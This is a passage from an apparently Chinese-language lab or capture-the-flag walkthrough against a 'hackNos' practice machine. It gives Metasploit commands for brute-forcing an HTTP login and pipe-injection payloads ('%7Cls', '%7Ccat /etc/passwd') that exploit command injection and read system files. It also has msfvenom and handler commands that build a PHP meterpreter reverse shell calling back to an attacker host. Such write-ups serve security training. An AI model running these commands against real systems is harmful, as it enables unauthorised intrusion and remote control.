vim /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt
(7)使用msfconsole进行爆破
msconsole
use auxiliary/scanner/http/http_login
show options # 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.7.20
exploit
(8)爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图
(9)burp抓包发现存在命令执行漏洞
(10)%7Cls查看,发现out.php
%7C 管道符
%7Cls --》 | ls
(11)查看out.php文件中发现过滤规则...
%7Ccat out.php
(12)查看查看/etc/passwd文件中发现recon用户是可以进行登录...
%7Ccat /etc/passwd
(13)使用MSF生成一个PHP木马并开启一个http服务提供下载...开启MSF监听模块
msfconsole
####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.48 lport=4444 -f raw > f4.php
####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.48
exploit
####开启Web服务
python3 -m http.server 80